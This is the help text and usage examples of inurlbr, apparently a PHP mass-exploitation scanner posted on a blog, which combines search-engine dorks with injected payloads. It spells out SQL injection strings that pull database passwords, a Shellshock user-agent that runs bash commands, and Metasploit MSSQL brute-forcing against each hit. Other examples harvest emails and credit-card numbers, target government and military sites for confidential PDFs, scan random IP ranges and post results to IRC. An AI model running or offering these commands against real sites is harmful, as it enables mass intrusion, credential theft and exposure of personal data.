PERMISSION:<br /><br /><br /><br />------<br /><br /><br /><br />```<br /><br /><br /><br /> ----------------------------------------------------------<br /><br /><br /><br />PHP Version 5.4.7<br /><br /><br /><br />php5-curl LIB<br /><br /><br /><br />php5-cli LIB <br /><br /><br /><br />cURL support enabled<br /><br /><br /><br />cURL Information 7.24.0<br /><br /><br /><br />allow_url_fopen On<br /><br /><br /><br />permission Reading & Writing<br /><br /><br /><br />User root privilege, or is in the sudoers group<br /><br /><br /><br />Operating system LINUX<br /><br /><br /><br />Proxy random TOR <br /><br /><br /><br /> ----------------------------------------------------------<br /><br /><br /><br />[+] PERMISSION EXECUTION: chmod +x inurlbr.php<br /><br /><br /><br />[+] INSTALLING LIB CURL: sudo apt-get install php5-curl<br /><br /><br /><br />[+] INSTALLING LIB CLI: sudo apt-get install php5-cli<br /><br /><br /><br />[+] INSTALLING PROXY TOR https://www.torproject.org/docs/debian.html.en<br /><br /><br /><br /> ----------------------------------------------------------<br /><br /><br /><br />resume: apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl<br /><br /><br /><br />```<br /><br /><br /><br />- HELP:<br /><br /><br /><br />------<br /><br /><br /><br />```<br /><br /><br /><br />-h<br /><br /><br /><br />--help Alternative long length help command.<br /><br /><br /><br />--ajuda Command to specify Help.<br /><br /><br /><br />--info Information script.<br /><br /><br /><br />--update Code update. <br /><br /><br /><br />-q Choose which search engine you want through [1...24] / [e1..6]]:<br /><br /><br /><br /> [options]:<br /><br /><br /><br /> 1 - GOOGLE / (CSE) GENERIC RANDOM / API<br /><br /><br /><br /> 2 - BING<br /><br /><br /><br /> 3 - YAHOO BR<br /><br /><br /><br /> 4 - ASK<br /><br /><br /><br /> 5 - HAO123 BR<br /><br /><br /><br /> 6 - GOOGLE (API)<br /><br /><br /><br /> 7 - LYCOS<br /><br /><br /><br /> 8 - UOL BR<br /><br /><br /><br /> 9 - YAHOO US<br /><br /><br /><br /> 10 - SAPO<br /><br /><br /><br /> 11 - DMOZ<br /><br /><br /><br /> 12 - GIGABLAST<br /><br /><br /><br /> 13 - NEVER<br /><br /><br /><br /> 14 - BAIDU BR<br /><br /><br /><br /> 15 - YANDEX<br /><br /><br /><br /> 16 - ZOO<br /><br /><br /><br /> 17 - HOTBOT<br /><br /><br /><br /> 18 - ZHONGSOU<br /><br /><br /><br /> 19 - HKSEARCH<br /><br /><br /><br /> 20 - EZILION<br /><br /><br /><br /> 21 - SOGOU<br /><br /><br /><br /> 22 - DUCK DUCK GO<br /><br /><br /><br /> 23 - BOOROW<br /><br /><br /><br /> 24 - GOOGLE(CSE) GENERIC RANDOM<br /><br /><br /><br /> ----------------------------------------<br /><br /><br /><br /> SPECIAL MOTORS<br /><br /><br /><br /> ----------------------------------------<br /><br /><br /><br /> e1 - TOR FIND<br /><br /><br /><br /> e2 - ELEPHANT<br /><br /><br /><br /> e3 - TORSEARCH<br /><br /><br /><br /> e4 - WIKILEAKS<br /><br /><br /><br /> e5 - OTN<br /><br /><br /><br /> e6 - EXPLOITS SHODAN<br /><br /><br /><br /> ----------------------------------------<br /><br /><br /><br /> all - All search engines / not special motors<br /><br /><br /><br /> Default: 1<br /><br /><br /><br /> Example: -q {op}<br /><br /><br /><br /> Usage: -q 1<br /><br /><br /><br /> -q 5<br /><br /><br /><br /> Using more than one engine: -q 1,2,5,6,11,24<br /><br /><br /><br /> Using all engines: -q all<br /><br /><br /><br /> <br /><br /><br /><br /> --proxy Choose which proxy you want to use through the search engine:<br /><br /><br /><br /> Example: --proxy {proxy:port}<br /><br /><br /><br /> Usage: --proxy localhost:8118<br /><br /><br /><br /> --proxy socks5://googleinurl@localhost:9050<br /><br /><br /><br /> --proxy http://admin:12334@172.16.0.90:8080<br /><br /><br /><br /> <br /><br /><br /><br /> --proxy-file Set font file to randomize your proxy to each search engine.<br /><br /><br /><br /> Example: --proxy-file {proxys}<br /><br /><br /><br /> Usage: --proxy-file proxys_list.txt<br /><br /><br /><br /><br /> <br /><br /><br /><br /> --time-proxy Set the time how often the proxy will be exchanged.<br /><br /><br /><br /> Example: --time-proxy {second}<br /><br /><br /><br /> Usage: --time-proxy 10<br /><br /><br /><br /><br /> <br /><br /><br /><br /> --proxy-http-file Set file with urls http proxy, <br /><br /><br /><br /> are used to bular capch search engines<br /><br /><br /><br /> Example: --proxy-http-file {youfilehttp}<br /><br /><br /><br /> Usage: --proxy-http-file http_proxys.txt<br /><br /><br /><br /> <br /><br /><br /><br /><br /> <br /><br /><br /><br /> --tor-random Enables the TOR function, each usage links an unique IP.<br /><br /><br /><br /><br /><br /><br /><br /><br /> -t Choose the validation type: op 1, 2, 3, 4, 5<br /><br /><br /><br /> [options]:<br /><br /><br /><br /> 1 - The first type uses default errors considering the script:<br /><br /><br /><br /> It establishes connection with the exploit through the get method.<br /><br /><br /><br /> Demo: www.alvo.com.br/pasta/index.php?id={exploit}<br /><br /><br /><br /> <br /><br /><br /><br /> 2 - The second type tries to valid the error defined by: -a='VALUE_INSIDE_THE _TARGET'<br /><br /><br /><br /> It also establishes connection with the exploit through the get method<br /><br /><br /><br /> Demo: www.alvo.com.br/pasta/index.php?id={exploit}<br /><br /><br /><br /> <br /><br /><br /><br /> 3 - The third type combine both first and second types:<br /><br /><br /><br /> Then, of course, it also establishes connection with the exploit through the get method<br /><br /><br /><br /> Demo: www.target.com.br{exploit}<br /><br /><br /><br /> Default: 1<br /><br /><br /><br /> Example: -t {op}<br /><br /><br /><br /> Usage: -t 1<br /><br /><br /><br /> <br /><br /><br /><br /> 4 - The fourth type a validation based on source file and will be enabled scanner standard functions.<br /><br /><br /><br /> The source file their values are concatenated with target url.<br /><br /><br /><br /> - Set your target with command --target {http://target}<br /><br /><br /><br /> - Set your file with command -o {file}<br /><br /><br /><br /> Explicative:<br /><br /><br /><br /> Source file values:<br /><br /><br /><br /> /admin/index.php?id=<br /><br /><br /><br /> /pag/index.php?id=<br /><br /><br /><br /> /brazil.php?new=<br /><br /><br /><br /> Demo: <br /><br /><br /><br /> www.target.com.br/admin/index.php?id={exploit}<br /><br /><br /><br /> www.target.com.br/pag/index.php?id={exploit}<br /><br /><br /><br /> www.target.com.br/brazil.php?new={exploit}<br /><br /><br /><br /> <br /><br /><br /><br /> 5 - (FIND PAGE) The fifth type of validation based on the source file,<br /><br /><br /><br /> Will be enabled only one validation code 200 on the target server, or if the url submit such code will be considered vulnerable.<br /><br /><br /><br /> - Set your target with command --target {http://target}<br /><br /><br /><br /> - Set your file with command -o {file}<br /><br /><br /><br /> Explicative:<br /><br /><br /><br /> Source file values:<br /><br /><br /><br /> /admin/admin.php<br /><br /><br /><br /> /admin.asp<br /><br /><br /><br /> /admin.aspx<br /><br /><br /><br /> Demo: <br /><br /><br /><br /> www.target.com.br/admin/admin.php<br /><br /><br /><br /> www.target.com.br/admin.asp<br /><br /><br /><br /> www.target.com.br/admin.aspx<br /><br /><br /><br /> Observation: If it shows the code 200 will be separated in the output file<br /><br /><br /><br /><br /> <br /><br /><br /><br /> DEFAULT ERRORS: <br /><br /><br /><br /> <br /><br /><br /><br /> [*]JAVA INFINITYDB, [*]LOCAL FILE INCLUSION, [*]ZIMBRA MAIL, [*]ZEND FRAMEWORK, <br /><br /><br /><br /> [*]ERROR MARIADB, [*]ERROR MYSQL, [*]ERROR JBOSSWEB, [*]ERROR MICROSOFT,<br /><br /><br /><br /> [*]ERROR ODBC, [*]ERROR POSTGRESQL, [*]ERROR JAVA INFINITYDB, [*]ERROR PHP,<br /><br /><br /><br /> [*]CMS WORDPRESS, [*]SHELL WEB, [*]ERROR JDBC, [*]ERROR ASP,<br /><br /><br /><br /> [*]ERROR ORACLE, [*]ERROR DB2, [*]JDBC CFM, [*]ERROS LUA, <br /><br /><br /><br /> [*]ERROR INDEFINITE<br /><br /><br /><br /> <br /><br /><br /><br /> <br /><br /><br /><br /> --dork Defines which dork the search engine will use.<br /><br /><br /><br /> Example: --dork {dork}<br /><br /><br /><br /> Usage: --dork 'site:.gov.br inurl:php? id'<br /><br /><br /><br /> - Using multiples dorks:<br /><br /><br /><br /> Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}<br /><br /><br /><br /> Usage: --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'<br /><br /><br /><br /><br /><br /><br /><br /><br /> --dork-file Set font file with your search dorks.<br /><br /><br /><br /> Example: --dork-file {dork_file}<br /><br /><br /><br /> Usage: --dork-file 'dorks.txt'<br /><br /><br /><br /><br /> <br /><br /><br /><br /> --exploit-get Defines which exploit will be injected through the GET method to each URL found.<br /><br /><br /><br /> Example: --exploit-get {exploit_get}<br /><br /><br /><br /> Usage: --exploit-get "?'´%270x27;"<br /><br /><br /><br /> <br /><br /><br /><br /> --exploit-post Defines which exploit will be injected through the POST method to each URL found.<br /><br /><br /><br /> Example: --exploit-post {exploit_post}<br /><br /><br /><br /> Usage: --exploit-post 'field1=valor1&field2=valor2&field3=?´0x273exploit;&botao=ok'<br /><br /><br /><br /> <br /><br /><br /><br /> --exploit-command Defines which exploit/parameter will be executed in the options: --command-vul/ --command-all. <br /><br /><br /><br /> The exploit-command will be identified by the paramaters: --command-vul/ --command-all as _EXPLOIT_ <br /><br /><br /><br /> Ex --exploit-command '/admin/config.conf' --command-all 'curl -v _TARGET__EXPLOIT_'<br /><br /><br /><br /> _TARGET_ is the specified URL/TARGET obtained by the process<br /><br /><br /><br /> _EXPLOIT_ is the exploit/parameter defined by the option --exploit-command.<br /><br /><br /><br /> Example: --exploit-command {exploit-command}<br /><br /><br /><br /> Usage: --exploit-command '/admin/config.conf' <br /><br /><br /><br /> <br /><br /><br /><br /> -a Specify the string that will be used on the search script:<br /><br /><br /><br /> Example: -a {string}<br /><br /><br /><br /> Usage: -a ''<br /><br /><br /><br /> <br /><br /><br /><br /> -d Specify the script usage op 1, 2, 3, 4, 5.<br /><br /><br /><br /> Example: -d {op}<br /><br /><br /><br /> Usage: -d 1 /URL of the search engine.<br /><br /><br /><br /> -d 2 /Show all the url.<br /><br /><br /><br /> -d 3 /Detailed request of every URL.<br /><br /><br /><br /> -d 4 /Shows the HTML of every URL.<br /><br /><br /><br /> -d 5 /Detailed request of all URLs.<br /><br /><br /><br /> -d 6 /Detailed PING - PONG irc. <br /><br /><br /><br /> <br /><br /><br /><br /> -s Specify the output file where it will be saved the vulnerable URLs.<br /><br /><br /><br /> <br /><br /><br /><br /> Example: -s {file}<br /><br /><br /><br /> Usage: -s your_file.txt<br /><br /><br /><br /> <br /><br /><br /><br /> -o Manually manage the vulnerable URLs you want to use from a file, without using a search engine.<br /><br /><br /><br /> Example: -o {file_where_my_urls_are}<br /><br /><br /><br /> Usage: -o tests.txt<br /><br /><br /><br /> <br /><br /><br /><br /> --persist Attempts when Google blocks your search.<br /><br /><br /><br /> The script tries to another google host / default = 4<br /><br /><br /><br /> Example: --persist {number_attempts}<br /><br /><br /><br /> Usage: --persist 7<br /><br /><br /><br /><br /> <br /><br /><br /><br /> --ifredirect Return validation method post REDIRECT_URL<br /><br /><br /><br /> Example: --ifredirect {string_validation}<br /><br /><br /><br /> Usage: --ifredirect '/admin/painel.php'<br /><br /><br /><br /><br /> <br /><br /><br /><br /> -m Enable the search for emails on the urls specified.<br /><br /><br /><br /> <br /><br /><br /><br /> -u Enables the search for URL lists on the url specified.<br /><br /><br /><br /><br /><br /><br /><br /><br /> --gc Enable validation of values with google webcache.<br /><br /><br /><br /> <br /><br /><br /><br /> --pr Progressive scan, used to set operators (dorks), <br /><br /><br /><br /> makes the search of a dork and valid results, then goes a dork at a time.<br /><br /><br /><br /> <br /><br /><br /><br /> --file-cookie Open cookie file.<br /><br /><br /><br /> <br /><br /><br /><br /> --save-as Save results in a certain place.<br /><br /><br /><br /><br /> <br /><br /><br /><br /> --shellshock Explore shellshock vulnerability by setting a malicious user-agent.<br /><br /><br /><br /><br /><br /><br /><br /><br /> --popup Run --command all or vuln in a parallel terminal.<br /><br /><br /><br /><br /> <br /><br /><br /><br /> --cms-check Enable simple check if the url / target is using CMS.<br /><br /><br /><br /><br /> <br /><br /><br /><br /> --no-banner Remove the script presentation banner.<br /><br /><br /><br /> <br /><br /><br /><br /> --unique Filter results in unique domains.<br /><br /><br /><br /><br /> <br /><br /><br /><br /> --beep Beep sound when a vulnerability is found.<br /><br /><br /><br /> <br /><br /><br /><br /> --alexa-rank Show alexa positioning in the results.<br /><br /><br /><br /> <br /><br /><br /><br /> --robots Show values file robots.<br /><br /><br /><br /> <br /><br /><br /><br /> --range Set range IP.<br /><br /><br /><br /> Example: --range {range_start,rage_end}<br /><br /><br /><br /> Usage: --range '172.16.0.5#172.16.0.255'<br /><br /><br /><br /><br /> <br /><br /><br /><br /> --range-rand Set amount of random ips.<br /><br /><br /><br /> Example: --range-rand {rand}<br /><br /><br /><br /> Usage: --range-rand '50'<br /><br /><br /><br /><br /> <br /><br /><br /><br /> --irc Sending vulnerable to IRC / server channel.<br /><br /><br /><br /> Example: --irc {server#channel}<br /><br /><br /><br /> Usage: --irc 'irc.rizon.net#inurlbrasil'<br /><br /><br /><br /><br /> <br /><br /><br /><br /> --http-header Set HTTP header.<br /><br /><br /><br /> Example: --http-header {youemail}<br /><br /><br /><br /> Usage: --http-header 'HTTP/1.1 401 Unauthorized,WWW-Authenticate: Basic realm="Top Secret"'<br /><br /><br /><br /> <br /><br /><br /><br /> --sedmail Sending vulnerable to email.<br /><br /><br /><br /> Example: --sedmail {youemail}<br /><br /><br /><br /> Usage: --sedmail youemail@inurl.com.br<br /><br /><br /><br /> <br /><br /><br /><br /> --delay Delay between research processes.<br /><br /><br /><br /> Example: --delay {second}<br /><br /><br /><br /> Usage: --delay 10<br /><br /><br /><br /> <br /><br /><br /><br /> --time-out Timeout to exit the process.<br /><br /><br /><br /> Example: --time-out {second}<br /><br /><br /><br /> Usage: --time-out 10<br /><br /><br /><br /><br /> <br /><br /><br /><br /> --ifurl Filter URLs based on their argument.<br /><br /><br /><br /> Example: --ifurl {ifurl}<br /><br /><br /><br /> Usage: --ifurl index.php?id=<br /><br /><br /><br /><br /> <br /><br /><br /><br /> --ifcode Valid results based on your return http code.<br /><br /><br /><br /> Example: --ifcode {ifcode}<br /><br /><br /><br /> Usage: --ifcode 200<br /><br /><br /><br /><br /><br /><br /><br /><br /> --ifemail Filter E-mails based on their argument.<br /><br /><br /><br /> Example: --ifemail {file_where_my_emails_are}<br /><br /><br /><br /> Usage: --ifemail sp.gov.br<br /><br /><br /><br /><br /> <br /><br /><br /><br /> --url-reference Define referring URL in the request to send him against the target.<br /><br /><br /><br /> Example: --url-reference {url}<br /><br /><br /><br /> Usage: --url-reference http://target.com/admin/user/valid.php<br /><br /><br /><br /><br /><br /><br /><br /><br /> --mp Limits the number of pages in the search engines.<br /><br /><br /><br /> Example: --mp {limit}<br /><br /><br /><br /> Usage: --mp 50<br /><br /><br /><br /> <br /><br /><br /><br /> --user-agent Define the user agent used in its request against the target.<br /><br /><br /><br /> Example: --user-agent {agent}<br /><br /><br /><br /> Usage: --user-agent 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'<br /><br /><br /><br /> Usage-exploit / SHELLSHOCK: <br /><br /><br /><br /> --user-agent '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;"'<br /><br /><br /><br /> Complete command: <br /><br /><br /><br /> php inurlbr.php --dork '_YOU_DORK_' -s shellshock.txt --user-agent '_YOU_AGENT_XPL_SHELLSHOCK' -t 2 -a '99887766555'<br /><br /><br /><br /><br /><br /><br /><br /><br /> --sall Saves all urls found by the scanner.<br /><br /><br /><br /> Example: --sall {file}<br /><br /><br /><br /> Usage: --sall your_file.txt<br /><br /><br /><br /><br /> <br /><br /><br /><br /> --command-vul Every vulnerable URL found will execute this command parameters.<br /><br /><br /><br /> Example: --command-vul {command}<br /><br /><br /><br /> Usage: --command-vul 'nmap sV -p 22,80,21 _TARGET_'<br /><br /><br /><br /> --command-vul './exploit.sh _TARGET_ output.txt'<br /><br /><br /><br /> --command-vul 'php miniexploit.php -t _TARGET_ -s output.txt'<br /><br /><br /><br /> <br /><br /><br /><br /> --command-all Use this commmand to specify a single command to EVERY URL found.<br /><br /><br /><br /> Example: --command-all {command}<br /><br /><br /><br /> Usage: --command-all 'nmap sV -p 22,80,21 _TARGET_'<br /><br /><br /><br /> --command-all './exploit.sh _TARGET_ output.txt'<br /><br /><br /><br /> --command-all 'php miniexploit.php -t _TARGET_ -s output.txt'<br /><br /><br /><br /> [!] Observation:<br /><br /><br /><br /> <br /><br /><br /><br /> _TARGET_ will be replaced by the URL/target found, although if the user <br /><br /><br /><br /> doesn't input the get, only the domain will be executed.<br /><br /><br /><br /> <br /><br /><br /><br /> _TARGETFULL_ will be replaced by the original URL / target found.<br /><br /><br /><br /> <br /><br /><br /><br /> _TARGETXPL_ will be replaced by the original URL / target found + EXPLOIT --exploit-get.<br /><br /><br /><br /> <br /><br /><br /><br /> _TARGETIP_ return of ip URL / target found.<br /><br /><br /><br /> <br /><br /><br /><br /> _URI_ Back URL set of folders / target found.<br /><br /><br /><br /> <br /><br /><br /><br /> _RANDOM_ Random strings.<br /><br /><br /><br /> <br /><br /><br /><br /> _PORT_ Capture port of the current test, within the --port-scan process.<br /><br /><br /><br /> <br /><br /><br /><br /> _EXPLOIT_ will be replaced by the specified command argument --exploit-command.<br /><br /><br /><br /> The exploit-command will be identified by the parameters --command-vul/ --command-all as _EXPLOIT_<br /><br /><br /><br /><br /> <br /><br /><br /><br /> --replace Replace values in the target URL.<br /><br /><br /><br /> Example: --replace {value_old[INURL]value_new}<br /><br /><br /><br /> Usage: --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user,Password+from+mysql.user+limit+0,1)=1'<br /><br /><br /><br /> --replace 'main.php?id=[INURL]main.php?id=1+and+substring(@@version,1,1)=1'<br /><br /><br /><br /> --replace 'index.aspx?id=[INURL]index.aspx?id=1%27´'<br /><br /><br /><br /> <br /><br /><br /><br /> --remove Remove values in the target URL.<br /><br /><br /><br /> Example: --remove {string}<br /><br /><br /><br /> Usage: --remove '/admin.php?id=0'<br /><br /><br /><br /> <br /><br /><br /><br /> --regexp Using regular expression to validate his research, the value of the <br /><br /><br /><br /> Expression will be sought within the target/URL.<br /><br /><br /><br /> Example: --regexp {regular_expression}<br /><br /><br /><br /> All Major Credit Cards:<br /><br /><br /><br /> Usage: --regexp '(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6011[0-9]{12}|3(?:0[0-5]|[68][0-9])[0-9]{11}|3[47][0-9]{13})'<br /><br /><br /><br /> <br /><br /><br /><br /> IP Addresses:<br /><br /><br /><br /> Usage: --regexp '((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))'<br /><br /><br /><br /> <br /><br /><br /><br /> EMAIL: <br /><br /><br /><br /> Usage: --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'<br /><br /><br /><br /> <br /><br /><br /><br /><br /> <br /><br /><br /><br /> ---regexp-filter Using regular expression to filter his research, the value of the <br /><br /><br /><br /> Expression will be sought within the target/URL.<br /><br /><br /><br /> Example: ---regexp-filter {regular_expression}<br /><br /><br /><br /> EMAIL: <br /><br /><br /><br /> Usage: ---regexp-filter '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'<br /><br /><br /><br /><br /><br /><br /><br /><br /><br /> <br /><br /><br /><br /> [!] Small commands manager:<br /><br /><br /><br /> <br /><br /><br /><br /> --exploit-cad Command register for use within the scanner.<br /><br /><br /><br /> Format {TYPE_EXPLOIT}::{EXPLOIT_COMMAND}<br /><br /><br /><br /> Example Format: NMAP::nmap -sV _TARGET_<br /><br /><br /><br /> Example Format: EXPLOIT1::php xpl.php -t _TARGET_ -s output.txt<br /><br /><br /><br /> Usage: --exploit-cad 'NMAP::nmap -sV _TARGET_' <br /><br /><br /><br /> Observation: Each registered command is identified by an id of your array.<br /><br /><br /><br /> Commands are logged in exploits.conf file.<br /><br /><br /><br /><br /> <br /><br /><br /><br /> --exploit-all-id Execute commands, exploits based on id of use,<br /><br /><br /><br /> (all) is run for each target found by the engine.<br /><br /><br /><br /> Example: --exploit-all-id {id,id}<br /><br /><br /><br /> Usage: --exploit-all-id 1,2,8,22<br /><br /><br /><br /> <br /><br /><br /><br /> --exploit-vul-id Execute commands, exploits based on id of use,<br /><br /><br /><br /> (vull) run command only if the target was considered vulnerable.<br /><br /><br /><br /> Example: --exploit-vul-id {id,id}<br /><br /><br /><br /> Usage: --exploit-vul-id 1,2,8,22<br /><br /><br /><br /><br /> <br /><br /><br /><br /> --exploit-list List all entries command in exploits.conf file.<br /><br /><br /><br /><br /> <br /><br /><br /><br /><br /> <br /><br /><br /><br /> [!] Running subprocesses:<br /><br /><br /><br /> <br /><br /><br /><br /> --sub-file Subprocess performs an injection <br /><br /><br /><br /> strings in URLs found by the engine, via GET or POST.<br /><br /><br /><br /> Example: --sub-file {youfile}<br /><br /><br /><br /> Usage: --sub-file exploits_get.txt<br /><br /><br /><br /> <br /><br /><br /><br /> --sub-get defines whether the strings coming from <br /><br /><br /><br /> --sub-file will be injected via GET.<br /><br /><br /><br /> Usage: --sub-get<br /><br /><br /><br /> <br /><br /><br /><br /> --sub-post defines whether the strings coming from <br /><br /><br /><br /> --sub-file will be injected via POST.<br /><br /><br /><br /> Usage: --sub-get<br /><br /><br /><br /> <br /><br /><br /><br /><br /> <br /><br /><br /><br /> --sub-cmd-vul Each vulnerable URL found within the sub-process<br /><br /><br /><br /> will execute the parameters of this command.<br /><br /><br /><br /> Example: --sub-cmd-vul {command}<br /><br /><br /><br /> Usage: --sub-cmd-vul 'nmap sV -p 22,80,21 _TARGET_'<br /><br /><br /><br /> --sub-cmd-vul './exploit.sh _TARGET_ output.txt'<br /><br /><br /><br /> --sub-cmd-vul 'php miniexploit.php -t _TARGET_ -s output.txt'<br /><br /><br /><br /> <br /><br /><br /><br /> --sub-cmd-all Run command to each target found within the sub-process scope.<br /><br /><br /><br /> Example: --sub-cmd-all {command}<br /><br /><br /><br /> Usage: --sub-cmd-all 'nmap sV -p 22,80,21 _TARGET_'<br /><br /><br /><br /> --sub-cmd-all './exploit.sh _TARGET_ output.txt'<br /><br /><br /><br /> --sub-cmd-all 'php miniexploit.php -t _TARGET_ -s output.txt'<br /><br /><br /><br /><br /> <br /><br /><br /><br /><br /> <br /><br /><br /><br /> --port-scan Defines ports that will be validated as open.<br /><br /><br /><br /> Example: --port-scan {ports}<br /><br /><br /><br /> Usage: --port-scan '22,21,23,3306'<br /><br /><br /><br /> <br /><br /><br /><br /> --port-cmd Define command that runs when finding an open door.<br /><br /><br /><br /> Example: --port-cmd {command}<br /><br /><br /><br /> Usage: --port-cmd './xpl _TARGETIP_:_PORT_'<br /><br /><br /><br /> --port-cmd './xpl _TARGETIP_/file.php?sqli=1'<br /><br /><br /><br /><br /> <br /><br /><br /><br /> --port-write Send values for door.<br /><br /><br /><br /> Example: --port-write {'value0','value1','value3'}<br /><br /><br /><br /> Usage: --port-write "'NICK nk_test','USER nk_test 8 * :_ola','JOIN #inurlbrasil','PRIVMSG #inurlbrasil : minha_msg'"<br /><br /><br /><br /><br /> <br /><br /><br /><br /><br /> <br /><br /><br /><br /><br /> <br /><br /><br /><br /> [!] Modifying values used within script parameters:<br /><br /><br /><br /> <br /><br /><br /><br /> md5 Encrypt values in md5.<br /><br /><br /><br /> Example: md5({value})<br /><br /><br /><br /> Usage: md5(102030)<br /><br /><br /><br /> Usage: --exploit-get 'user?id=md5(102030)'<br /><br /><br /><br /><br /> <br /><br /><br /><br /> base64 Encrypt values in base64.<br /><br /><br /><br /> Example: base64({value})<br /><br /><br /><br /> Usage: base64(102030)<br /><br /><br /><br /> Usage: --exploit-get 'user?id=base64(102030)'<br /><br /><br /><br /> <br /><br /><br /><br /> hex Encrypt values in hex.<br /><br /><br /><br /> Example: hex({value})<br /><br /><br /><br /> Usage: hex(102030)<br /><br /><br /><br /> Usage: --exploit-get 'user?id=hex(102030)'<br /><br /><br /><br /><br /> <br /><br /><br /><br /> Generate random values.<br /><br /><br /><br /> Example: random({character_counter})<br /><br /><br /><br /> Usage: random(8)<br /><br /><br /><br /> Usage: --exploit-get 'user?id=random(8)'<br /><br /><br /><br /><br /> <br /><br /><br /><br />```<br /><br /><br /><br /><br /> <br /><br /><br /><br /><br /> <br /><br /><br /><br />- COMMANDS SIMPLE:<br /><br /><br /><br />------<br /><br /><br /><br />```<br /><br /><br /><br />./inurlbr.php --dork 'inurl:php?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;" <br /><br /><br /><br /> <br /><br /><br /><br />./inurlbr.php --dork 'inurl:aspx?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;" <br /><br /><br /><br /> <br /><br /><br /><br />./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"<br /><br /><br /><br /> <br /><br /><br /><br />./inurlbr.php --dork 'index of wp-content/uploads' -s save.txt -q 1,6,2,4 -t 2 --exploit-get '?' -a 'Index of /wp-content/uploads'<br /><br /><br /><br /> <br /><br /><br /><br />./inurlbr.php --dork 'site:.mil.br intext:(confidencial) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'confidencial'<br /><br /><br /><br /> <br /><br /><br /><br />./inurlbr.php --dork 'site:.mil.br intext:(secreto) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'secreto' <br /><br /><br /><br /> <br /><br /><br /><br />./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"<br /><br /><br /><br /> <br /><br /><br /><br />./inurlbr.php --dork '.new.php?new id' -s save.txt -q 1,6,7,2,3 -t 1 --exploit-get '+UNION+ALL+SELECT+1,concat(0x3A3A4558504C4F49542D5355434553533A3A,@@version),3,4,5;' -a '::EXPLOIT-SUCESS::'<br /><br /><br /><br /> <br /><br /><br /><br />./inurlbr.php --dork 'new.php?id=' -s teste.txt --exploit-get ?´0x27 --command-vul 'nmap sV -p 22,80,21 _TARGET_'<br /><br /><br /><br /> <br /><br /><br /><br />./inurlbr.php --dork 'site:pt inurl:aspx (id|q)' -s bruteforce.txt --exploit-get ?´0x27 --command-vul 'msfcli auxiliary/scanner/mssql/mssql_login RHOST=_TARGETIP_ MSSQL_USER=inurlbr MSSQL_PASS_FILE=/home/pedr0/Documentos/passwords E'<br /><br /><br /><br /> <br /><br /><br /><br />./inurlbr.php --dork 'site:br inurl:id & inurl:php' -s get.txt --exploit-get "?´'%270x27;" --command-vul 'python ../sqlmap/sqlmap.py -u "_TARGETFULL_" --dbs'<br /><br /><br /><br /> <br /><br /><br /><br />./inurlbr.php --dork 'inurl:index.php?id=' -q 1,2,10 --exploit-get "'?´0x27'" -s report.txt --command-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'<br /><br /><br /><br /><br /><br /><br /><br /><br />./inurlbr.php --dork 'site:.gov.br email' -s reg.txt -q 1 --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'<br /><br /><br /><br /> <br /><br /><br /><br />./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s emails.txt -m<br /><br /><br /><br /> <br /><br /><br /><br />./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s urls.txt -u<br /><br /><br /><br /><br /><br /><br /><br /><br />./inurlbr.php --dork 'site:gov.bo' -s govs.txt --exploit-all-id 1,2,6 <br /><br /><br /><br /><br /><br /><br /><br /><br />./inurlbr.php --dork 'site:.uk' -s uk.txt --user-agent 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)' <br /><br /><br /><br /><br /><br /><br /><br /><br />./inurlbr.php --dork-file 'dorksSqli.txt' -s govs.txt --exploit-all-id 1,2,6 <br /><br /><br /><br /><br /><br /><br /><br /><br />./inurlbr.php --dork-file 'dorksSqli.txt' -s sqli.txt --exploit-all-id 1,2,6 --irc 'irc.rizon.net#inurlbrasil' <br /><br /><br /><br /> <br /><br /><br /><br />./inurlbr.php --dork 'inurl:"cgi-bin/login.cgi"' -s cgi.txt --ifurl 'cgi' --command-all 'php xplCGI.php _TARGET_' <br /><br /><br /><br /><br /><br /><br /><br /><br />./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4<br /><br /><br /><br /> <br /><br /><br /><br />./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get "?´'%270x27;"<br /><br /><br /><br /> <br /><br /><br /><br />./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get "?pass=1234" -a ''<br /><br /><br /><br /> <br /><br /><br /><br />./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find_valid_cod-200.txt -s output.txt -t 5<br /><br /><br /><br /> <br /><br /><br /><br />./inurlbr.php --range '200.20.10.1,200.20.10.255' -s output.txt --command-all 'php roteador.php _TARGETIP_' <br /><br /><br /><br /><br /><br /><br /><br /><br />./inurlbr.php --range-rad '1500' -s output.txt --command-all 'php roteador.php _TARGETIP_' <br /><br /><br /><br /><a href="https://www.blogger.com/blogger.g?blogID=4472344379716989945"></a><a href="https://www.blogger.com/blogger.g?blogID=4472344379716989945"></a><br /><br /><br /><br /><br />./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?´'%270x27;" -q 1,2,6,4,5,9,7,8 